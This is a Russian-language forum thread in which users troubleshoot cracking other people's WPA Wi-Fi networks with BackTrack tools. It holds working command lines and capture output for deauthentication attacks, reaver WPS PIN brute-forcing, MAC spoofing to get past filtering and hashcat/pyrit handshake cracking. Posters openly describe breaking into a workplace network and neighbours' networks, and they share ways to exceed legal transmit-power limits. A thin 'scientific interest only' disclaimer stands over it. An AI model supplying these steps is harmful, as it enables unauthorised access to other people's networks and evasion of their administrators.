- не появляется mon0 интерфейс: карточка или драйвер не поддерживают monitor mode

- В лог сыпятся строки [!] WARNING: Receive timeout occured: какая то проблема с wi-fi картой, причину я не смог найти, просто использовал другой адаптер.

- В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng)

Дополнительно:

Данный материал предназначен только в целях научного интереса и восстановления своего забытого пароля. Соблюдайте законодательство РФ.

Если ещё есть какие то вопросы то пишем обращаемся. Писал на скорую руку в будущем добавлю картинки и возможно видеоинструкцию.

Матерьял взят с сайта http://blogzadrota.ru

Хм...

Подскажите что не так, при запуске монитора выдает такую мессагу:

Opening start

open failed: No such file or directory

Opening wlan1

open failed: No such file or directory

Read 0 packets.

No networks found, exiting.

По всем признакам большая дистанция до точки .
Попробуй чего то по ближе -49 сигнал это слабо !!!


Сигнал на 5 баллов, через стенку, мой роутер вон показывает -47 в одной комнате.

Так что сигнал очень хороший.

Тесть идей не каких как понимаю нет, удочку закинули и разбирайся как хочешь.

Лады с убунту ковырятся не хочется, ну её нафик это занятие, время мало.

)))


Сигнал на 5 баллов, через стенку, мой роутер вон показывает -47 в одной комнате.
Так что сигнал очень хороший.
Тесть идей не каких как понимаю нет, удочку закинули и разбирайся как хочешь.
Лады с убунту ковырятся не хочется, ну её нафик это занятие, время мало.


Что ж там разбираться то, открыл консоль да и набрал нужные команды, собрал хендшейки и делов то!

Неплохая статья с Блогмега про взлом вайфай, старожилам конечно америки не откроет, но новичкам может быть полезно

http://blogmega.ru/hitech/it/vzlom-wi-fi-parolya/

http://i48.fastpic.ru/big/2013/0331/91/a2c79c3c132cc207e89fb792eadb5a91.jpeg

Недавно взломал вафлю на работе с помощью bt5 и подбора пароля через hashcat,ввожу пароль идет подключение,но соединения с нетом нет ( может сисадмин поставил фильтрацию по mac адресу?подскажите как можно решить проблему?P.S Пробовал вручную прописывать ip 192.168.1.1 (.2 .3 и тд) и dns 255.255.255.0 не помогло (((

Недавно взломал вафлю на работе с помощью bt5 и подбора пароля через hashcat,ввожу пароль идет подключение,но соединения с нетом нет ( может сисадмин поставил фильтрацию по mac адресу?подскажите как можно решить проблему?P.S Пробовал вручную прописывать ip 192.168.1.1 (.2 .3 и тд) и dns 255.255.255.0 не помогло (((


Не совсем понятно, вы вообще подключились? Возможно там просто нет подключения к интернету, всего делов то)

Не совсем понятно, вы вообще подключились? Возможно там просто нет подключения к интернету, всего делов то)


Интернет там есть всегда,подключаюсь с андройда,пишет что сохранено но не подключает,только что нарыл в нете как поменять mac адрес на андройде(есть mac с которого есть подключение) завтра попробую )

У меня вопрос:У меня есть пароль от взломанной вафли,как мне теперь узнать пин код роутера,на случай если админ задумает сменить пароль от вафли?и можно ли самому прописывать mac адреса во взломанной сети(на случай фильтрации)?

какое максимальное значение TX-Power (мощность передачи) для Боливии? У меня адаптер на 38 dBm

Не могу установить мощность больше 30 dBm

Кто нибудь с этим сталкивался?

У меня вопрос:У меня есть пароль от взломанной вафли,как мне теперь узнать пин код роутера,на случай если админ задумает сменить пароль от вафли?и можно ли самому прописывать mac адреса во взломанной сети(на случай фильтрации)?


а не проще изменить mac адрес своего компа на разрешенный?

Змей Гарыныч said:
а не проще изменить mac адрес своего компа на разрешенный?


У меня есть разрешенный mac,но если сисадмин вдруг решит сменить пароль как тогда подключатся?опять взлом?я ломал вафлю через bt5,у меня есть только пароль,а хотелось бы и пин код от роутера(так наверно проще будет если сменят пароль от вафли)

- В логе [!] WARNING : Fialed to associate with XX:XX:XX:XX:XX:XX (ESSID: d-link) : на точке включена фильтрация по мак адресам. нужно сниферить нужный мак и ставить его себе. (airodump-ng)


Можно поподробней описать смену mac адреса на разрешенный в BT5 и wifislax.Заранее спасибо,с меня +

Нужна помощь,если кто сталкивался,подскажите:Под ключаюсь к взлом анной вафле (WPA 2 PSK) с телефона(Samsung galaxy s2 root есть),на родном мак адресе выдает:подключение-аутентификация-получение IP адреса-сохранено защита WPA 2 и потом опять все сначало(значок вафли не загорается).Узнал мак адрес по которому точно есть подключение,поставил его себе,стало выдавать:подключение-аутентификация и на этом висит(ждал минут двадцать).Что можно сделать чтоб подключиться? Может надо и имя хоста заменить на андройде android-a42a3a1bbef7af65)?

Можно где-нибудь скачать рабочую версию Hashcat ? На сайте автора только "outdated" , которые не хотят работать. А hashcat-gui alternate я не понял как запускать, подскажите, пожалуйста.

Можно где-нибудь скачать рабочую версию Hashcat ? На сайте автора только "outdated" , которые не хотят работать. А hashcat-gui alternate я не понял как запускать, подскажите, пожалуйста.


Качаешь alternate версию http://home.btconnect.com/md5decrypter/HashcatGUI_0281.zip

Качаешь https://hashcat.net/oclhashcat-plus/ вот здесь v0.14, разархивируешь в папку с GUI, запускаешь этот гуи, все должно работать, если не работает - внизу нужно выбрать местоположение запускаемого файла (строка Binary, нужно выбрать в зависимости от разрядности винды и чипа видеокарты), у меня так: D:\hashcat-gui-0.5.1\oclHashcat-plus\cudaHashcat-plus64.exe

Можно где-нибудь скачать рабочую версию Hashcat ? На сайте автора только "outdated" , которые не хотят работать. А hashcat-gui alternate я не понял как запускать, подскажите, пожалуйста.


Можно и старую версию запустить только надо время перевести назад(я переводил ровно на 1 год)

В статье "Взлом Wi-Fi для чайников"

airmon-ng start wlan1(то есть мы запустили внешний адаптер).

aireplay-ng --deauth 5 -a a0:21:b7:a0:71:3c -c 00:24:2b:6d:3f:d5 wlan1( а здесь может надо заместо wlan1-------> mon0? проверял на ноутбуке без адаптера, с wlan0 команда не проводилась, а с mon0 прошла.

В статье "Взлом Wi-Fi для чайников"
airmon-ng start wlan1(то есть мы запустили внешний адаптер).
aireplay-ng --deauth 5 -a a0:21:b7:a0:71:3c -c 00:24:2b:6d:3f:d5 wlan1( а здесь может надо заместо wlan1-------> mon0? проверял на ноутбуке без адаптера, с wlan0 команда не проводилась, а с mon0 прошла.


Потому что все утилиты работают с монитором на адаптере, а не самим адаптером. Ваш кэп.

можно поподробней про мультизагрузочную флешку ?

В статье была указана команда на увеличение мощности внешней антенны:

root@bt:~# iw reg set BO

root@bt:~# iwconfig wlan1 txpower 27

С этой командой мощность не проходила ,а с этой увеличил до 30

меняем регион

iw reg set BO

Затем: меняем мощность

iw dev wlan1 set txpower fixed 3000

в итоге вместо 20dbm(для России) получаем 30dbm

проверяемiwconfig wlan(x) в моём случае wlan1

Использовал антенну TL-WN7200ND.

В статье была указана команда на увеличение мощности внешней антенны:
root@bt:~# iw reg set BO
root@bt:~# iwconfig wlan1 txpower 27
С этой командой мощность не проходила ,а с этой увеличил до 30
меняем регион
iw reg set BO
Затем: меняем мощность
iw dev wlan1 set txpower fixed 3000
в итоге вместо 20dbm(для России) получаем 30dbm
проверяем
iwconfig wlan(x) в моём случае wlan1
Использовал антенну TL-WN7200ND.


А какое максимальное значение txpower для боливии?

у меня антена на 38, можно поставить 38?

Змей Гарыныч said:
А какое максимальное значение txpower для боливии?
у меня антена на 38, можно поставить 38?


если антена на 38дб (дай описание интерестно просто) то по идеи сигнал улутшится на 38дб,

например сигнал -88дб то с антеной -50дб а этоо ооООчень ощютимая разница

Максимально допустимая мощность на выходе адаптера (не антенны!) никак не связана с антенной, которая подключается к нему. Мощность зависит от программного ограничения (того самого региона: Россия/Боливия/Япония/etc.) и от возможности самой железки (если она может выдать, скажем, 200 милливат максимум, то хоть какие команды прописывай - ватта из неё не выжать. Не спалив саму цепь, разумеется). Так что необходимо искать ТТХ самого чипа, на котором адаптер собран, либо экспериментально подбирать мощность (больше, чем железка способна выдать, программно её не задать, я вот к чему). А от антенны будет зависеть лишь усиление.

По поводу антенны на 38 dB... Максимум усиления, которое я видел в сети - 24 dBi: http://www.ulmart.ru/goods/287694

Какого размера будет монстр с усилением 38 db - страшно представить, так что, по-видимому, где-то произошла путаница в понятиях... То, что раскачать на выходе 38 db, задав мощность 30 db адаптеру, и привернув антенну на 8 db - поверю, а вот подключить к адаптеру антенну на 38 децибелл - это уже можно потихоньку прохожих начинать прожаривать...

По сабжу: думаю, что мощность адаптеров в пресловутой Боливии вообще не ограничена (то бишь, сколько из железа можно выжать - столько и выжимайте наздоровье). Во всяком случае, беглое чтение результатов в гугле заставляют думать именно так.

Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!

я в этом деле чайник, первый раз ломаю

начал ломать с ноутбука со встроенным Wi-Fi

запустил: root@bt:~# airodump-ng mon0

есть три точки с параметром PWR в деапазоне 40-70.

в таблице текущих ассоциаций клиентов к точкам иногда появляться строчки, но редко в графе BSSID написано что-то кроеме (not associated)

когда запускаю airodump-ng на запись пакетов только одной сети из списка в файл testcap.cap: там только одна строчка, оставил на сутки, проверил файл aircrack-ng и нечего.

может я чего-то делаю не так?

to Alookard

Пробуй делать разрыв клиента от АР, пример:

aireplay-ng --deauth 5 -a F0:88:68:51:00:44 -c АА:26:B7:E5:3B:8E mon0

где:

F0:88:68:51:00:44 - mac точки доступа

АА:26:B7:E5:3B:8E - mac клиента, что коннектился к АР

mon0 - твой девайс))

цифра 5 это количество потоков или как хз назвать чего, то, что точка отправляет для деассоциации юзера от АР..ставь цифру и более 20-30..

В таком случае при переподключении юзеров, словишь handshake ))

как узнать mac клиента, что коннектился к АР?

как узнать
mac клиента, что коннектился к АР
?


http://linuxcenter.kz/sites/default/files/userfiles/image/nokia_n900/2012/03/crack_wifi/4.jpg

00:26:5A:6D:C8:B6 точка доступа, к которой ассоциируется клиент с маком 00:24:2C:13:9E:49

Это смотри под строками

BSSID STATION PWR Rate Lost Packets Probes

00:26:5A:6D:C8:B6(точка) 00:24:2C:13:9E:49(клиент)

//Почитай _http://www.levinkv.ru/wi-fi

funny_kaplan, спасибо, понял, но у меня там написано (not associated), почти всегда. почему так происходит?

можно ли использовать airodump-ng и besside-ng mon0 одновременно?

ок, пойду почитаю..

добавлю: начал ходить с ноутом по квартире: там столько точек доступа, что таблица текущих ассоциаций клиентов к точкам уходит за монитор

больше 80 точек доступа. я обязан взломать несколько!

запустил sudo wash -i mon0 - пока тоже нечего. от этой команды будет толк? как и от besside-ng mon0?


root@bt:~# aircrack-ng *.cap
Opening f1-01.cap
Opening f1-02.cap
Opening kurg1-01.cap
Opening n11-01.cap
Opening nast1-01.cap
Opening rozi1-01.cap
Opening san1-01.cap
Opening t11-01.cap
Opening t11-02.cap
Opening tes1-01.cap
Opening tp-lin1-01.cap
Opening wep.cap
Opening wpa.cap
Opening z11-01.cap
Opening zhdan1-01.cap
Read 247848 packets.

# BSSID ESSID Encryption

1 00:1E:58:B7:CB:B5 Nastya_Home No data - WEP or WPA
2 F8:D1:11:50:1C:1C Portal No data - WEP or WPA
3 34:08:04:11:A3:BC tase4ka EAPOL+No data - WEP or WPA
4 F8:1A:67:64:87:D6 TP-LINK_6487D6 No data - WEP or WPA
5 1C:BD:B9:7A:DE:BD Zhdanov No data - WEP or WPA
6 F4:EC:38:D1:4D:04 kurguzov4ab EAPOL+No data - WEP or WPA

.....
.....

94 BC:AE:C5:A7:D5:7A 311 No data - WEP or WPA
95 90:F6:52:8A:32:50 VERA No data - WEP or WPA

Index number of target network ? 1

Opening f1-01.cap
Opening f1-02.cap
Opening kurg1-01.cap
Opening n11-01.cap
Opening nast1-01.cap
Opening rozi1-01.cap
Opening san1-01.cap
Opening t11-01.cap
Opening t11-02.cap
Opening tes1-01.cap
Opening tp-lin1-01.cap
Opening wep.cap
Opening wpa.cap
Opening z11-01.cap
Opening zhdan1-01.cap
Got no data packets from target network!

Quitting aircrack-ng...



root@bt:~# airodump-ng -w f1 mon0

CH 4 ][ Elapsed: 2 hours 55 mins ][ 2013-05-12 13:33 ][ paused output
^ BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A0:F3:C1:7E:48:10 -34 292 0 0 6 54e. WPA2 CCMP PSK rozita 00:1E:58:B7:CB:B5 -51 17774 0 0 2 54 . WPA2 CCMP PSK Nastya_Home 34:08:04:11:A3:BC -60 44872 503 0 11 54e. WPA2 CCMP PSK tase4ka
1C:BD:B9:7A:DE:BD -66 42512 0 0 11 54 WPA TKIP PSK Zhdanov F4:EC:38:D1:4D:04 -74 21759 33 0 11 54e. WPA2 CCMP PSK kurguzov4ab
F8:1A:67:64:87:D6 -83 48814 0 0 6 54e. WPA2 CCMP PSK TP-LINK_6487D6
F8:D1:11:5C:AF:06 -82 15025 0 0 4 54e. WPA2 CCMP PSK svjat
00:18:39:2F:C0:58 -84 6059 0 0 6 54 WEP WEP Mashka
B0:48:7A:C1:82:E4 -84 603 0 0 4 54e. WPA2 CCMP PSK Race
90:94:E4:31:DF:F0 -85 1561 0 0 11 54e WPA2 CCMP PSK mix@
00:0E:F4:E0:97:00 -85 667 0 0 6 54e WPA2 CCMP PSK NikishaHome
00:27:22:8A:4C:C4 -85 943 0 0 1 54e. WEP WEP kurguz11a
94:0C:6D:C4:4D:28 -85 1874 0 0 1 54 . WPA2 CCMP PSK Network
F0:7D:68:9D:03:06 -85 1744 0 0 9 54e. WPA2 CCMP PSK Sasha
54:E6:FC:B7:3C:0C -86 3863 0 0 4 54e. WPA CCMP PSK Tynycoon
84:C9:B2:AB:3B:D4 -86 324 0 0 1 54e WPA2 TKIP PSK Dom
54:E6:FC:DC:76:E8 -86 271 0 0 9 54e. WPA2 CCMP PSK 313k ^ 1C:7E:E5:40:F8:E8 -87 1529 0 0 2 54e. WPA2 CCMP PSK Broadcom
00:0E:F4:E0:6D:8A -87 1177 0 0 1 54 WPA2 CCMP PSK kievskaya ^ 90:F6:52:3D:D6:1E -87 9071 0 0 1 54e. WPA2 CCMP PSK PollyComm-16
C8:BE:19:B0:8D:66 -87 1182 0 0 8 54e WPA2 CCMP PSK DIR-300
00:14:D1:B5:46:33 0 413 0 0 1 54e WPA2 CCMP PSK Sanya

BSSID STATION PWR Rate Lost Frames Probe

(not associated) F8:D1:11:07:2A:78 -77 0 -12 0 5
(not associated) 00:1F:3C:73:F9:38 -79 0 -12 0 103
(not associated) 28:98:7B:3E:E3:3A -85 0 -12 0 32 svjat
(not associated) 48:5D:60:06:E2:23 -87 0 -12 0 24

sudo wash -i mon0
- пока тоже нечего. от этой команды будет толк? как и от
besside-ng mon0
?


Запускай так:

sudo wash -i mon0 -C

В конце параметр -C

Выберешь юзера с WPS и далее его reaver'ом.

Запускай так:
sudo wash -i mon0
-C
В конце параметр -C
Выберешь юзера с WPS и далее его reaver'ом.


sudo reaver -i mon0 -b BC:AE:C5:713:17 -vv - много ошибок, идет повтор первого пина много раз (предположительно до бесконечности), пробовал разные точки.. возможно, нужно еще какой-то параметр

sudo reaver -i mon0 -b BC:AE:C5:713:17 -vv
- много ошибок, идет повтор первого пина много раз (предположительно до бесконечности), пробовал разные точки.. возможно, нужно еще какой-то параметр


Возможно точка далеко, пробуй ночью, реально лучше ИМХО.

запускай так:

sudo reaver -i mon0 -b CC:5D:4E:98:2A:22 -a -vv -c 2

где -c это номер канала, на котором АР, в данном случае 2

//Убедись, что на точке есть WPS, может мак сменить свой надо хз..:

так:

sudo ifconfig wlan1 down

sudo macchanger wlan1 --mac=BC:CF:CC:C5:2E:47

sudo ifconfig wlan1 up

где wlan1 - это физический девайс

--mac=BC:CF:CC:C5:2E:47 тут укажешь желаемый мак, вернее не желаемый, а тот, что ассоциируется с точкой. Мак этот ты выше знаешь как словить.

//надо ставить macchanger, если его нет.

на одной работает медленно, а на другой все по прежнему. может быть я не тот мак ввел. пробовал на двух разных. может быть там защита, можно как-то узнать?

что нужно написать, что бы я находил только клиентов? а то если ищу с точками, то на экран не влазят. а если к точке - то не находит, потому что там в графе (not associated).

/что такое Decloak в airodump-ng?

/в чем могут быть трудности? может быть, что у точек доступа хорошая связь и я их хорошо слышу, а они меня плохо и пользователей я плохо слышу?

/почему в airodump-ng я не вижу PRW больше 90? это какое-то ограничение? его можно отключить?


root@bt:~# airodump-ng -w f1 mon0

CH 4 ][ Elapsed: 12 hours 26 mins ][ 2013-05-12 23:03 ][ Decloak: 34:08:04:11:A3:BC
CH 10 ][ Elapsed: 12 hours 26 mins ][ 2013-05-12 23:03 ][ Decloak: 34:08:04:11:A3:BC
CH 1 ][ Elapsed: 12 hours 38 mins ][ 2013-05-12 23:16 ][ paused output

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

34:08:04:11:A3:BC -26 149245 13307 0 11 54e. WPA2 CCMP PSK tase4ka
F4:EC:38:D1:4D:04 -77 78610 4391 0 11 54e. WPA2 CCMP PSK kurguzov4ab
F8:1A:67:64:87:D6 -70 152572 2499 0 6 54e. WPA2 CCMP PSK TP-LINK_6487D6
1C:BD:B9:7A:DE:BD -65 134592 424 0 11 54 WPA TKIP PSK Zhdanov
90:F6:52:3D:D6:1E -86 24729 2 0 1 54e. WPA2 CCMP PSK PollyComm-16
00:1E:58:B7:CB:B5 -79 66291 0 0 2 54 . WPA2 CCMP PSK Nastya_Home
F8:D1:11:5C:AF:06 -83 26417 0 0 4 54e. WPA2 CCMP PSK svjat
FC:C8:97:96:85:14 -83 8678 0 0 11 54e. WPA2 CCMP PSK UKrtelecom_V6PaS4
F8:1A:67:64:CA:68 -85 2706 0 0 6 54e. WPA2 CCMP PSK NIKOZA
C8:BE:19:B6:92:64 -82 8482 0 0 7 54e WPA2 CCMP PSK DIR-300_MTM
94:0C:6D:C4:4D:28 -84 9318 0 0 1 54 . WPA2 CCMP PSK Network
00:1C:F0:3B:BD:FF -85 15212 0 0 2 54e. WEP WEP oleg4b69
00:18:39:2F:C0:58 -85 17304 0 0 6 54 WEP WEP Mashka
1C:7E:E5:40:F8:E8 -86 6081 0 0 2 54e. WPA2 CCMP PSK Broadcom
F4:6D:04:8C:A3:04 -87 243 0 0 1 54e WPA2 CCMP PSK Sergey
C8:3A:35:3E:28:E0 0 249 0 0 6 54e. WPA2 CCMP PSK Tenda_3E28E0
F4:EC:38:D6:AD:36 -86 20 0 0 11 54 . WPA2 CCMP PSK TP
84:C9:B2:AB:3B:D4 -87 536 0 0 1 54e WPA2 TKIP PSK Dom
FC:C8:97:98:4C:00 -86 2594 0 0 6 54e. WPA2 CCMP PSK Myzuchenko
F8:D1:11:18:4F:C2 -84 19409 0 0 1 54e. WPA2 MGT Shustrik
F0:7D:68:9D:03:06 -86 5088 0 0 9 54e. WPA2 CCMP PSK Sasha

BSSID STATION PWR Rate Lost Frames Probe

4:08:04:11:A3:BC CC:52:AF:12:6A:E8 0 12 - 1 1954 139993
34:08:04:11:A3:BC 00:16:6F:52:07:57 -56 0 -12 20 16965 tase4ka,Sunbel_pool,DOCOUA-Guest,Catering,Ketering,Sasha,ACK1,Botany Lobby,WiFiOffice
34:08:04:11:A3:BC 00:22:43:21:B1:59 -59 0 -12 23 14641 tase4ka,WWW-��_Network_1,NETGEAR
1C:BD:B9:7A:DE:BD 00:26:AB:17:70:27 -63 0 -12 0 94013 Zhdanov
1C:BD:B9:7A:DE:BD 78:DD:08:F2:BA:CB -75 0 -12 0 56402 Zhdanov
(not associated) 1C:B0:94:B7:4A:53 -73 0 - 9 32 163 internet vid sumtel.ua,Edimax,valentain,BELTELECOM WIFI,Galyan,Ridne misto,dlink,McDonalds4,KeryaNe
(not associated) 74:2F:68:DD:46:A8 -78 0 -12 0 49 Valdai
(not associated) 90:C1:15:E6:87:61 -79 0 -12 0 6 SHTUKA
(not associated) C8:60:00:43:E6:7E -80 0 -12 0 63

aireplay-ng --deauth применяю, но хендшейки не ловятсья. есть Decloak

Извиняюсь за то, что повторяюсь, но не получил ни одного ответа...

"Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!"

Извиняюсь за то, что повторяюсь, но не получил ни одного ответа...
"Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!"


Возможно в Вашем хендшейке не было Beacon пакетов. Можете попробовать в hashcat конверторе Essid ломаемой точки доступа прописать.

Никто не тестировал Wi-Fi адаптер TP-LINK TL-WN8200ND(имеет 2 антенны) и как она по сравнению TP-LINK TL-WN7200ND и ALFA AWUS036H . Имею TP-LINK TL-WN7200ND для российского рынка, неплохая антенна, но интересно они все идут на рынок с одинаковой мощностью или в Европу и Америку помощней? И если написано 27 db, будет ли поддерживаться в Windows или всё равно не больше 20 db разрешённых законодательством?

P.S. Может кому пригодится: При использование Wi-Fi адаптера TP-LINK TL-WN7200ND программы часто не видят при сканировании сети(точки), помогает простое передергивание USB шнура из компьютера.

Прочитал в интернете:Никакими командами и потченными драйверами, в том числе и правкой реестра мощность не регулируется, оно зашито в EEPROM (энерго независимая память) чипа.

В линуксе менял мощность до 30dbm:

ifconfig wlan1 down

macchanger -r wlan1 (меняется автоматически свой MAC адрес)

iw reg set BO

iw dev wlan1 set txpower fixed 3000

ifconfig wlan1 up

iwconfig wlan1(проверяем свой адаптер на выставленную мощность)

После этого запускал airodump-ng и проверял точки на мощность сигнала, что при 20 dbm,что при 30 dbm мощность сигнала от точек, так и не изменилась.

Никто не тестировал Wi-Fi адаптер TP-LINK TL-WN8200ND(имеет 2 антенны) и как она по сравнению TP-LINK TL-WN7200ND и ALFA AWUS036H . Имею TP-LINK TL-WN7200ND для российского рынка, неплохая антенна, но интересно они все идут на рынок с одинаковой мощностью или в Европу и Америку помощней? И если написано 27 db, будет ли поддерживаться в Windows или всё равно не больше 20 db разрешённых законодательством?
P.S. Может кому пригодится: При использование Wi-Fi адаптера TP-LINK TL-WN7200ND программы часто не видят при сканировании сети(точки), помогает простое передергивание USB шнура из компьютера.
Прочитал в интернете:Никакими командами и потченными драйверами, в том числе и правкой реестра мощность не регулируется, оно зашито в EEPROM (энерго независимая память) чипа.
В линуксе менял мощность до 30dbm:
ifconfig wlan1 down
macchanger -r wlan1 (меняется автоматически свой MAC адрес)
iw reg set BO
iw dev wlan1 set txpower fixed 3000
ifconfig wlan1 up
iwconfig wlan1(проверяем свой адаптер на выставленную мощность)
После этого запускал airodump-ng и проверял точки на мощность сигнала, что при 20 dbm,что при 30 dbm
мощность сигнала от точек, так и не изменилась.


Где то Вычитал, проверял вроде помогло мне. Так как в Украину и Росию автоматом зашито ограничение в 20Дб, что делали люди - удаляли полностью драйвера и тд. Устанавливали расположение USA а так же часовой пояс на соотвествующий. Устанавливали драйвера. Меняли на старое расположение в Windows и часовой пояс. При установки драйверов автоматом считываються с системы твое расположение и сооветсвенно подбираються параметры. Со временем уже не меняються. Исходящий сигнал усиливался.

Извиняюсь за то, что повторяюсь, но не получил ни одного ответа...
"Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!"


Если указать в онлайн-конвертере кошки ESSID - не будет эффекта, ресурс выдаст ошибку No valid handshake. Почему пакеты коммвью всеми ломалками воспринимаются как битые - неясно. Из сложившейся ситуации мной найден единственный пока что выход:


1. Устанавливаем (именно устанавливаем, не грузим с LiveCD/USB - нам потом с дровами колдовать) тот же BAckTrack.
2. Устанавливаем связку Driver+SDK для своей видеокарты.
3. Устанавливаем/обновляем pyrit (либо пропускаем этот пункт, так как в последних сборках ВТ pyrit уже установлен)
4. Запускаем pyrit как написано в мануале к нему, НО (вот тут весь фокус) дополнительно в опциях указываем -b и -e . Смысл в том, что пирит найдёт EAPOL-пакеты указанной точки доступа по её MAC-адресу и принудительно присвоит этой связке то имя, которое указано после ключа -e.



...После этого запускал airodump-ng и проверял точки на мощность сигнала, что при 20 dbm,что при 30 dbm
мощность сигнала от точек, так и не изменилась.


Она и не должна измениться, в этом нет ничего удивительного. Вы увеличили мощность передатчика на своём адаптере, а не чувствительность приёмника. Разница будет в том, что некоторые из клиентов, до которых раньше Ваш адаптер не дотягивался, теперь будут откликаться на ту же деаутентификацию.

Подскажите как мне во взломанной сети добавить разрешенный Mac адрес?(с компа могу выходить в сеть,поменяв Mac на разрешенный,а можно ли еще прописать в этой сети Mac от телефона?)

Где то Вычитал, проверял вроде помогло мне. Так как в Украину и Росию автоматом зашито ограничение в 20Дб, что делали люди - удаляли полностью драйвера и тд. Устанавливали расположение USA а так же часовой пояс на соотвествующий. Устанавливали драйвера. Меняли на старое расположение в Windows и часовой пояс. При установки драйверов автоматом считываються с системы твое расположение и сооветсвенно подбираються параметры. Со временем уже не меняються. Исходящий сигнал усиливался.


Надо применить это, плюс на всякий случай при переходе опять на местный часовой пояс:

В Windows ,для владельцев антенн TP-LINK TL-WN7200ND с чипами (RT2870/RT3070 Wireless Adapter) лучше драйвера устанавливать с сайта Ralink , Драйвера от Ralink (http://yadi.sk/d/vo_dltCC5eSBy) ; нашёл вроде повышать мощность адаптера в Windows ,не знаю поможет или нет.

Зайти в Windows в C:\WINDOWS\system32\RaCoInst.dat

потом открываем его

http://s42.radikal.ru/i095/1305/b7/a1500976872e.png

затем делаем Правку

http://s019.radikal.ru/i626/1305/ee/e940102f3356.png

и Сохраняем изменения.

Вот что "поймал" besside-ng

http://i47.fastpic.ru/big/2013/0604/d9/63e8dcf70fdad62a4f976b2c9c32add9.png

И что видит aircrack в wpa.cap

http://i47.fastpic.ru/big/2013/0604/a4/c4527c3fffd76c00ff1881a5686eaba4.png

Это норма?

Вот что "поймал" besside-ng
http://i47.fastpic.ru/big/2013/0604/d9/63e8dcf70fdad62a4f976b2c9c32add9.png
И что видит aircrack в wpa.cap
http://i47.fastpic.ru/big/2013/0604/a4/c4527c3fffd76c00ff1881a5686eaba4.png
Это норма?


Ты не поймал, хендшейк.

Пишешь: aircrack-ng ....cap и он показывает. Но даже если он покажет что ты поймал, Хендшейк может быть инвалидом. У меня так было много раз, тогда Wireshark тебе подскажет на 100%

Всем привет.

Приобрёл адаптер тп линк 7200,все его очень хвалили,из бюджетных ессно,так как сразу брать Альфу не охото. Так вот этот распрекрасный адаптер не работает пока не с одной программой,он на ралинке 3070. Бэктрек 5 р3 не видит,виндовые проги не видят,типо комовью и все прочие,в общем не подскажите какая прога его увидит ? Прочитал что старые бэктреки его держат,но там нужно ещё ривер вкачивать через репозиторий,который не всегда робит и ещё про беини пишут,но я так и не понял что это,так же про вайфай слакс и вайфай вэй хотел бы спросить,кто что думает.

Николай 174 said:
Всем привет.
Приобрёл адаптер тп линк 7200,все его очень хвалили,из бюджетных ессно,так как сразу брать Альфу не охото. Так вот этот распрекрасный адаптер не работает пока не с одной программой,он на ралинке 3070. Бэктрек 5 р3 не видит,виндовые проги не видят,типо комовью и все прочие,в общем не подскажите какая прога его увидит ? Прочитал что старые бэктреки его держат,но там нужно ещё ривер вкачивать через репозиторий,который не всегда робит и ещё про беини пишут,но я так и не понял что это,так же про вайфай слакс и вайфай вэй хотел бы спросить,кто что думает.


При использование Wi-Fi адаптера TP-LINK TL-WN7200ND программы часто не видят при сканировании сети(точки), помогает простое передергивание USB шнура из компьютера.С BTR3 адаптер 7200nd прекрасно работает.

Stranger@

Я уже всё пробовал у меня ещё 2 свистка два 12х от длинка,тоже не в одной программе не видно,в чём может быть проблема ? Может ноутбук виноват ?

Николай 174 said:
Stranger@
Я уже всё пробовал у меня ещё 2 свистка два 12х от длинка,тоже не в одной программе не видно,в чём может быть проблема ? Может ноутбук виноват ?


Попробуй пока для адаптера TP-LINK TL-WN7200ND проверенные мной драйвера для Windows:

ДРАЙВЕРА Ralink (RT2870/RT3070) (http://yadi.sk/d/vo_dltCC5eSBy)

Это для коммовью ? В смысле мне нужны не только дрова но и программа под которой мой тп линк 7200 будет работать. Типо бэктрека например.

Доброго времени суток! Подскажите пожалуйста, (я совсем чайник) что я делаю не так? Пытаюсь взломать вай фай, все в точности как описано на форуме, но как дело доходит до подбора пароля, происходит какая то ошибка. Фото монитора пытаюсь приложить, так даже это не выходит

Может мой словарь который я скачал не в том формате или он лежит не в том месте, или необходимо как то указывать путь?

